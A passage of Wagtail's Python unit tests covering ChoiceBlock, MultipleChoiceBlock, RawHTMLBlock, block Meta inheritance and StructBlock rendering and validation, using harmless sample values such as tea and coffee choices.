def test_validate_required_choice_block(self):
block = blocks.ChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')])
self.assertEqual(block.clean('coffee'), 'coffee')
with self.assertRaises(ValidationError):
block.clean('whisky')
with self.assertRaises(ValidationError):
block.clean('')
with self.assertRaises(ValidationError):
block.clean(None)
def test_render_non_required_choice_block(self):
block = blocks.ChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], required=False)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_non_required_choice_block_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee')]
block = blocks.ChoiceBlock(choices=callable_choices, required=False)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_validate_non_required_choice_block(self):
block = blocks.ChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], required=False)
self.assertEqual(block.clean('coffee'), 'coffee')
with self.assertRaises(ValidationError):
block.clean('whisky')
self.assertEqual(block.clean(''), '')
self.assertEqual(block.clean(None), '')
def test_render_choice_block_with_existing_blank_choice(self):
block = blocks.ChoiceBlock(
choices=[('tea', 'Tea'), ('coffee', 'Coffee'), ('', 'No thanks')],
required=False)
html = block.render_form(None, prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertInHTML('<option value="" selected="selected">No thanks</option>', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee">Coffee</option>', html)
def test_render_choice_block_with_existing_blank_choice_and_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee'), ('', 'No thanks')]
block = blocks.ChoiceBlock(
choices=callable_choices,
required=False)
html = block.render_form(None, prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertInHTML('<option value="" selected="selected">No thanks</option>', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertIn('<option value="coffee">Coffee</option>', html)
def test_named_groups_without_blank_option(self):
block = blocks.ChoiceBlock(
choices=[
('Alcoholic', [
('gin', 'Gin'),
('whisky', 'Whisky'),
]),
('Non-alcoholic', [
('tea', 'Tea'),
('coffee', 'Coffee'),
]),
])
# test rendering with the blank option selected
html = block.render_form(None, prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertInHTML('<option value="" selected="selected">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertIn('<option value="tea">Tea</option>', html)
# test rendering with a non-blank option selected
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
def test_named_groups_with_blank_option(self):
block = blocks.ChoiceBlock(
choices=[
('Alcoholic', [
('gin', 'Gin'),
('whisky', 'Whisky'),
]),
('Non-alcoholic', [
('tea', 'Tea'),
('coffee', 'Coffee'),
]),
('Not thirsty', [
('', 'No thanks')
]),
],
required=False)
# test rendering with the blank option selected
html = block.render_form(None, prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertNotInHTML('<option value="" selected="selected">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="" selected="selected">No thanks</option>', html)
# test rendering with a non-blank option selected
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertNotInHTML('<option value="" selected="selected">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
def test_subclassing(self):
class BeverageChoiceBlock(blocks.ChoiceBlock):
choices = [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
block = BeverageChoiceBlock(required=False)
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
# subclasses of ChoiceBlock should deconstruct to a basic ChoiceBlock for migrations
self.assertEqual(
block.deconstruct(),
(
'wagtail.core.blocks.ChoiceBlock',
[],
{
'choices': [('tea', 'Tea'), ('coffee', 'Coffee')],
'required': False,
},
)
)
def test_searchable_content(self):
block = blocks.ChoiceBlock(choices=[
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
])
self.assertEqual(block.get_searchable_content("choice-1"),
["Choice 1"])
def test_searchable_content_with_callable_choices(self):
def callable_choices():
return [
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
]
block = blocks.ChoiceBlock(choices=callable_choices)
self.assertEqual(block.get_searchable_content("choice-1"),
["Choice 1"])
def test_optgroup_searchable_content(self):
block = blocks.ChoiceBlock(choices=[
('Section 1', [
('1-1', "Block 1"),
('1-2', "Block 2"),
]),
('Section 2', [
('2-1', "Block 1"),
('2-2', "Block 2"),
]),
])
self.assertEqual(block.get_searchable_content("2-2"),
["Section 2", "Block 2"])
def test_invalid_searchable_content(self):
block = blocks.ChoiceBlock(choices=[
('one', 'One'),
('two', 'Two'),
])
self.assertEqual(block.get_searchable_content('three'), [])
def test_searchable_content_with_lazy_translation(self):
block = blocks.ChoiceBlock(choices=[
('choice-1', __("Choice 1")),
('choice-2', __("Choice 2")),
])
result = block.get_searchable_content("choice-1")
# result must survive JSON (de)serialisation, which is not the case for
# lazy translation objects
result = json.loads(json.dumps(result))
self.assertEqual(result, ["Choice 1"])
def test_optgroup_searchable_content_with_lazy_translation(self):
block = blocks.ChoiceBlock(choices=[
(__('Section 1'), [
('1-1', __("Block 1")),
('1-2', __("Block 2")),
]),
(__('Section 2'), [
('2-1', __("Block 1")),
('2-2', __("Block 2")),
]),
])
result = block.get_searchable_content("2-2")
# result must survive JSON (de)serialisation, which is not the case for
# lazy translation objects
result = json.loads(json.dumps(result))
self.assertEqual(result, ["Section 2", "Block 2"])
def test_deconstruct_with_callable_choices(self):
def callable_choices():
return [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
block = blocks.ChoiceBlock(choices=callable_choices, required=False)
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
self.assertEqual(
block.deconstruct(),
(
'wagtail.core.blocks.ChoiceBlock',
[],
{
'choices': callable_choices,
'required': False,
},
)
)
def test_render_with_validator(self):
choices = [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
def validate_tea_is_selected(value):
raise ValidationError("You must select 'tea'")
block = blocks.ChoiceBlock(choices=choices, validators=[validate_tea_is_selected])
with self.assertRaises(ValidationError):
block.clean('coffee')
class TestMultipleChoiceBlock(WagtailTestUtils, SimpleTestCase):
def setUp(self):
from django.db.models.fields import BLANK_CHOICE_DASH
self.blank_choice_dash_label = BLANK_CHOICE_DASH[0][1]
def test_render_required_multiple_choice_block(self):
block = blocks.MultipleChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')])
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_required_multiple_choice_block_with_default(self):
block = blocks.MultipleChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], default='tea')
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_required_multiple_choice_block_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee')]
block = blocks.MultipleChoiceBlock(choices=callable_choices)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_validate_required_multiple_choice_block(self):
block = blocks.MultipleChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')])
self.assertEqual(block.clean(['coffee']), ['coffee'])
with self.assertRaises(ValidationError):
block.clean(['whisky'])
with self.assertRaises(ValidationError):
block.clean('')
with self.assertRaises(ValidationError):
block.clean(None)
def test_render_non_required_multiple_choice_block(self):
block = blocks.MultipleChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], required=False)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_non_required_multiple_choice_block_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee')]
block = blocks.MultipleChoiceBlock(choices=callable_choices, required=False)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_validate_non_required_multiple_choice_block(self):
block = blocks.MultipleChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], required=False)
self.assertEqual(block.clean(['coffee']), ['coffee'])
with self.assertRaises(ValidationError):
block.clean(['whisky'])
self.assertEqual(block.clean(''), [])
self.assertEqual(block.clean(None), [])
def test_render_multiple_choice_block_with_existing_blank_choice(self):
block = blocks.MultipleChoiceBlock(
choices=[('tea', 'Tea'), ('coffee', 'Coffee'), ('', 'No thanks')],
required=False)
html = block.render_form("", prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertInHTML('<option value="" selected="selected">No thanks</option>', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee">Coffee</option>', html)
def test_render_multiple_choice_block_with_existing_blank_choice_and_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee'), ('', 'No thanks')]
block = blocks.MultipleChoiceBlock(
choices=callable_choices,
required=False)
html = block.render_form("", prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertInHTML('<option value="" selected="selected">No thanks</option>', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertIn('<option value="coffee">Coffee</option>', html)
def test_named_groups_without_blank_option(self):
block = blocks.MultipleChoiceBlock(
choices=[
('Alcoholic', [
('gin', 'Gin'),
('whisky', 'Whisky'),
]),
('Non-alcoholic', [
('tea', 'Tea'),
('coffee', 'Coffee'),
]),
])
# test rendering with the blank option selected
html = block.render_form(None, prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertIn('<option value="tea">Tea</option>', html)
# test rendering with a non-blank option selected
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
def test_named_groups_with_blank_option(self):
block = blocks.MultipleChoiceBlock(
choices=[
('Alcoholic', [
('gin', 'Gin'),
('whisky', 'Whisky'),
]),
('Non-alcoholic', [
('tea', 'Tea'),
('coffee', 'Coffee'),
]),
('Not thirsty', [
('', 'No thanks')
]),
],
required=False)
# test rendering with the blank option selected
html = block.render_form(None, prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertIn('<option value="tea">Tea</option>', html)
# test rendering with a non-blank option selected
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertNotInHTML('<option value="" selected="selected">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
def test_subclassing(self):
class BeverageMultipleChoiceBlock(blocks.MultipleChoiceBlock):
choices = [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
block = BeverageMultipleChoiceBlock(required=False)
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
# subclasses of ChoiceBlock should deconstruct to a basic ChoiceBlock for migrations
self.assertEqual(
block.deconstruct(),
(
'wagtail.core.blocks.MultipleChoiceBlock',
[],
{
'choices': [('tea', 'Tea'), ('coffee', 'Coffee')],
'required': False,
},
)
)
def test_searchable_content(self):
block = blocks.MultipleChoiceBlock(choices=[
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
])
self.assertEqual(block.get_searchable_content("choice-1"),
["Choice 1"])
def test_searchable_content_with_callable_choices(self):
def callable_choices():
return [
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
]
block = blocks.MultipleChoiceBlock(choices=callable_choices)
self.assertEqual(block.get_searchable_content("choice-1"),
["Choice 1"])
def test_optgroup_searchable_content(self):
block = blocks.MultipleChoiceBlock(choices=[
('Section 1', [
('1-1', "Block 1"),
('1-2', "Block 2"),
]),
('Section 2', [
('2-1', "Block 1"),
('2-2', "Block 2"),
]),
])
self.assertEqual(block.get_searchable_content("2-2"),
["Section 2", "Block 2"])
def test_invalid_searchable_content(self):
block = blocks.MultipleChoiceBlock(choices=[
('one', 'One'),
('two', 'Two'),
])
self.assertEqual(block.get_searchable_content('three'), [])
def test_searchable_content_with_lazy_translation(self):
block = blocks.MultipleChoiceBlock(choices=[
('choice-1', __("Choice 1")),
('choice-2', __("Choice 2")),
])
result = block.get_searchable_content("choice-1")
# result must survive JSON (de)serialisation, which is not the case for
# lazy translation objects
result = json.loads(json.dumps(result))
self.assertEqual(result, ["Choice 1"])
def test_optgroup_searchable_content_with_lazy_translation(self):
block = blocks.MultipleChoiceBlock(choices=[
(__('Section 1'), [
('1-1', __("Block 1")),
('1-2', __("Block 2")),
]),
(__('Section 2'), [
('2-1', __("Block 1")),
('2-2', __("Block 2")),
]),
])
result = block.get_searchable_content("2-2")
# result must survive JSON (de)serialisation, which is not the case for
# lazy translation objects
result = json.loads(json.dumps(result))
self.assertEqual(result, ["Section 2", "Block 2"])
def test_deconstruct_with_callable_choices(self):
def callable_choices():
return [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
block = blocks.MultipleChoiceBlock(choices=callable_choices, required=False)
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
self.assertEqual(
block.deconstruct(),
(
'wagtail.core.blocks.MultipleChoiceBlock',
[],
{
'choices': callable_choices,
'required': False,
},
)
)
def test_render_with_validator(self):
choices = [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
def validate_tea_is_selected(value):
raise ValidationError("You must select 'tea'")
block = blocks.MultipleChoiceBlock(choices=choices, validators=[validate_tea_is_selected])
with self.assertRaises(ValidationError):
block.clean('coffee')
class TestRawHTMLBlock(unittest.TestCase):
def test_get_default_with_fallback_value(self):
default_value = blocks.RawHTMLBlock().get_default()
self.assertEqual(default_value, '')
self.assertIsInstance(default_value, SafeData)
def test_get_default_with_none(self):
default_value = blocks.RawHTMLBlock(default=None).get_default()
self.assertEqual(default_value, '')
self.assertIsInstance(default_value, SafeData)
def test_get_default_with_empty_string(self):
default_value = blocks.RawHTMLBlock(default='').get_default()
self.assertEqual(default_value, '')
self.assertIsInstance(default_value, SafeData)
def test_get_default_with_nonempty_string(self):
default_value = blocks.RawHTMLBlock(default='<blink>BÖÖM</blink>').get_default()
self.assertEqual(default_value, '<blink>BÖÖM</blink>')
self.assertIsInstance(default_value, SafeData)
def test_serialize(self):
block = blocks.RawHTMLBlock()
result = block.get_prep_value(mark_safe('<blink>BÖÖM</blink>'))
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertNotIsInstance(result, SafeData)
def test_deserialize(self):
block = blocks.RawHTMLBlock()
result = block.to_python('<blink>BÖÖM</blink>')
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertIsInstance(result, SafeData)
def test_render(self):
block = blocks.RawHTMLBlock()
result = block.render(mark_safe('<blink>BÖÖM</blink>'))
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertIsInstance(result, SafeData)
def test_render_form(self):
block = blocks.RawHTMLBlock()
result = block.render_form(mark_safe('<blink>BÖÖM</blink>'), prefix='rawhtml')
self.assertIn('<textarea ', result)
self.assertIn('name="rawhtml"', result)
self.assertIn('<blink>BÖÖM</blink>', result)
def test_form_response(self):
block = blocks.RawHTMLBlock()
result = block.value_from_datadict({'rawhtml': '<blink>BÖÖM</blink>'}, {}, prefix='rawhtml')
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertIsInstance(result, SafeData)
def test_value_omitted_from_data(self):
block = blocks.RawHTMLBlock()
self.assertFalse(block.value_omitted_from_data({'rawhtml': 'ohai'}, {}, 'rawhtml'))
self.assertFalse(block.value_omitted_from_data({'rawhtml': ''}, {}, 'rawhtml'))
self.assertTrue(block.value_omitted_from_data({'nothing-here': 'nope'}, {}, 'rawhtml'))
def test_clean_required_field(self):
block = blocks.RawHTMLBlock()
result = block.clean(mark_safe('<blink>BÖÖM</blink>'))
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertIsInstance(result, SafeData)
with self.assertRaises(ValidationError):
block.clean(mark_safe(''))
def test_clean_nonrequired_field(self):
block = blocks.RawHTMLBlock(required=False)
result = block.clean(mark_safe('<blink>BÖÖM</blink>'))
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertIsInstance(result, SafeData)
result = block.clean(mark_safe(''))
self.assertEqual(result, '')
self.assertIsInstance(result, SafeData)
def test_render_with_validator(self):
def validate_contains_foo(value):
if 'foo' not in value:
raise ValidationError("Value must contain 'foo'")
block = blocks.RawHTMLBlock(validators=[validate_contains_foo])
with self.assertRaises(ValidationError):
block.clean(mark_safe('<p>bar</p>'))
class TestMeta(unittest.TestCase):
def test_set_template_with_meta(self):
class HeadingBlock(blocks.CharBlock):
class Meta:
template = 'heading.html'
block = HeadingBlock()
self.assertEqual(block.meta.template, 'heading.html')
def test_set_template_with_constructor(self):
block = blocks.CharBlock(template='heading.html')
self.assertEqual(block.meta.template, 'heading.html')
def test_set_template_with_constructor_overrides_meta(self):
class HeadingBlock(blocks.CharBlock):
class Meta:
template = 'heading.html'
block = HeadingBlock(template='subheading.html')
self.assertEqual(block.meta.template, 'subheading.html')
def test_meta_nested_inheritance(self):
"""
Check that having a multi-level inheritance chain works
"""
class HeadingBlock(blocks.CharBlock):
class Meta:
template = 'heading.html'
test = 'Foo'
class SubHeadingBlock(HeadingBlock):
class Meta:
template = 'subheading.html'
block = SubHeadingBlock()
self.assertEqual(block.meta.template, 'subheading.html')
self.assertEqual(block.meta.test, 'Foo')
def test_meta_multi_inheritance(self):
"""
Check that multi-inheritance and Meta classes work together
"""
class LeftBlock(blocks.CharBlock):
class Meta:
template = 'template.html'
clash = 'the band'
label = 'Left block'
class RightBlock(blocks.CharBlock):
class Meta:
default = 'hello'
clash = 'the album'
label = 'Right block'
class ChildBlock(LeftBlock, RightBlock):
class Meta:
label = 'Child block'
block = ChildBlock()
# These should be directly inherited from the LeftBlock/RightBlock
self.assertEqual(block.meta.template, 'template.html')
self.assertEqual(block.meta.default, 'hello')
# This should be inherited from the LeftBlock, solving the collision,
# as LeftBlock comes first
self.assertEqual(block.meta.clash, 'the band')
# This should come from ChildBlock itself, ignoring the label on
# LeftBlock/RightBlock
self.assertEqual(block.meta.label, 'Child block')
class TestStructBlock(SimpleTestCase):
def test_initialisation(self):
block = blocks.StructBlock([
('title', blocks.CharBlock()),
('link', blocks.URLBlock()),
])
self.assertEqual(list(block.child_blocks.keys()), ['title', 'link'])
def test_initialisation_from_subclass(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
self.assertEqual(list(block.child_blocks.keys()), ['title', 'link'])
def test_initialisation_from_subclass_with_extra(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock([
('classname', blocks.CharBlock())
])
self.assertEqual(list(block.child_blocks.keys()), ['title', 'link', 'classname'])
def test_initialisation_with_multiple_subclassses(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
class StyledLinkBlock(LinkBlock):
classname = blocks.CharBlock()
block = StyledLinkBlock()
self.assertEqual(list(block.child_blocks.keys()), ['title', 'link', 'classname'])
def test_initialisation_with_mixins(self):
"""
The order of fields of classes with multiple parent classes is slightly
surprising at first. Child fields are inherited in a bottom-up order,
by traversing the MRO in reverse. In the example below,
``StyledLinkBlock`` will have an MRO of::
[StyledLinkBlock, StylingMixin, LinkBlock, StructBlock, ...]
This will result in ``classname`` appearing *after* ``title`` and
``link`` in ``StyleLinkBlock`.child_blocks`, even though
``StylingMixin`` appeared before ``LinkBlock``.
"""
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
class StylingMixin(blocks.StructBlock):
classname = blocks.CharBlock()
class StyledLinkBlock(StylingMixin, LinkBlock):
source = blocks.CharBlock()
block = StyledLinkBlock()
self.assertEqual(list(block.child_blocks.keys()),
['title', 'link', 'classname', 'source'])
def test_render(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
html = block.render(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}))
expected_html = '\n'.join([
'<dl>',
'<dt>title</dt>',
'<dd>Wagtail site</dd>',
'<dt>link</dt>',
'<dd>http://www.wagtail.io</dd>',
'</dl>',
])
self.assertHTMLEqual(html, expected_html)
def test_get_api_representation_calls_same_method_on_fields_with_context(self):
"""
The get_api_representation method of a StructBlock should invoke
the block's get_api_representation method on each field and the
context should be passed on.
"""
class ContextBlock(blocks.CharBlock):
def get_api_representation(self, value, context=None):
return context[value]
class AuthorBlock(blocks.StructBlock):
language = ContextBlock()
author = ContextBlock()
block = AuthorBlock()
api_representation = block.get_api_representation(
{
'language': 'en',
'author': 'wagtail',
},
context={
'en': 'English',
'wagtail': 'Wagtail!'
}
)
self.assertDictEqual(
api_representation, {
'language': 'English',
'author': 'Wagtail!'
}
)
def test_render_unknown_field(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
html = block.render(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
'image': 10,
}))
self.assertIn('<dt>title</dt>', html)
self.assertIn('<dd>Wagtail site</dd>', html)
self.assertIn('<dt>link</dt>', html)
self.assertIn('<dd>http://www.wagtail.io</dd>', html)
# Don't render the extra item
self.assertNotIn('<dt>image</dt>', html)
def test_render_bound_block(self):
# the string representation of a bound block should be the value as rendered by
# the associated block
class SectionBlock(blocks.StructBlock):
title = blocks.CharBlock()
body = blocks.RichTextBlock()
block = SectionBlock()
struct_value = block.to_python({
'title': 'hello',
'body': '<b>world</b>',
})
body_bound_block = struct_value.bound_blocks['body']
expected = '<b>world</b>'
self.assertEqual(str(body_bound_block), expected)
def test_get_form_context(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
context = block.get_form_context(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertTrue(isinstance(context['children'], collections.OrderedDict))
self.assertEqual(len(context['children']), 2)
self.assertTrue(isinstance(context['children']['title'], blocks.BoundBlock))
self.assertEqual(context['children']['title'].value, "Wagtail site")
self.assertTrue(isinstance(context['children']['link'], blocks.BoundBlock))
self.assertEqual(context['children']['link'].value, 'http://www.wagtail.io')
self.assertEqual(context['block_definition'], block)
self.assertEqual(context['prefix'], 'mylink')
def test_render_form(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock(required=False)
link = blocks.URLBlock(required=False)
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertIn('<div class="struct-block">', html)
self.assertIn('<div class="field char_field widget-text_input fieldname-title">', html)
self.assertIn('<label class="field__label" for="mylink-title">Title</label>', html)
self.assertInHTML(
'<input id="mylink-title" name="mylink-title" placeholder="Title" type="text" value="Wagtail site" />', html
)
self.assertIn('<div class="field url_field widget-url_input fieldname-link">', html)
self.assertInHTML(
(
'<input id="mylink-link" name="mylink-link" placeholder="Link"'
' type="url" value="http://www.wagtail.io" />'
),
html
)
self.assertNotIn('<li class="required">', html)
def test_custom_render_form_template(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock(required=False)
link = blocks.URLBlock(required=False)
class Meta:
form_template = 'tests/block_forms/struct_block_form_template.html'
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertIn('<div>Hello</div>', html)
self.assertHTMLEqual('<div>Hello</div>', html)
self.assertTrue(isinstance(html, SafeText))
def test_custom_render_form_template_jinja(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock(required=False)
link = blocks.URLBlock(required=False)
class Meta:
form_template = 'tests/jinja2/struct_block_form_template.html'
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertIn('<div>Hello</div>', html)
self.assertHTMLEqual('<div>Hello</div>', html)
self.assertTrue(isinstance(html, SafeText))
def test_render_required_field_indicator(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock(required=True)
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertIn('<div class="field required">', html)
def test_render_form_unknown_field(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
'image': 10,
}), prefix='mylink')
self.assertInHTML(
(
'<input id="mylink-title" name="mylink-title" placeholder="Title"'
' type="text" value="Wagtail site" />'
),
html
)
self.assertInHTML(
(
'<input id="mylink-link" name="mylink-link" placeholder="Link" type="url"'
' value="http://www.wagtail.io" />'
),
html
)
# Don't render the extra field
self.assertNotIn('mylink-image', html)
def test_render_form_uses_default_value(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock(default="Torchbox")
link = blocks.URLBlock(default="http://www.torchbox.com")
block = LinkBlock()
html = block.render_form(block.to_python({}), prefix='mylink')
self.assertInHTML(
'<input id="mylink-title" name="mylink-title" placeholder="Title" type="text" value="Torchbox" />', html
)
self.assertInHTML(
(
'<input id="mylink-link" name="mylink-link" placeholder="Link"'
' type="url" value="http://www.torchbox.com" />'
),
html
)
def test_render_form_with_help_text(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
class Meta:
help_text = "Self-promotion is encouraged"
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertInHTML('<div class="help"> <svg class="icon icon-help default" aria-hidden="true" focusable="false"><use href="#icon-help"></use></svg> Self-promotion is encouraged</div>', html)
# check it can be overridden in the block constructor
block = LinkBlock(help_text="Self-promotion is discouraged")
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertInHTML('<div class="help"> <svg class="icon icon-help default" aria-hidden="true" focusable="false"><use href="#icon-help"></use></svg> Self-promotion is discouraged</div>', html)
def test_media_inheritance(self):
class ScriptedCharBlock(blocks.CharBlock):
media = forms.Media(js=['scripted_char_block.js'])
class LinkBlock(blocks.StructBlock):
title = ScriptedCharBlock(default="Torchbox")
link = blocks.URLBlock(default="http://www.torchbox.com")
block = LinkBlock()
self.assertIn('scripted_char_block.js', ''.join(block.all_media().render_js()))
def test_html_declaration_inheritance(self):
class CharBlockWithDeclarations(blocks.CharBlock):
def html_declarations(self):
return '<script type="text/x-html-template">hello world</script>'
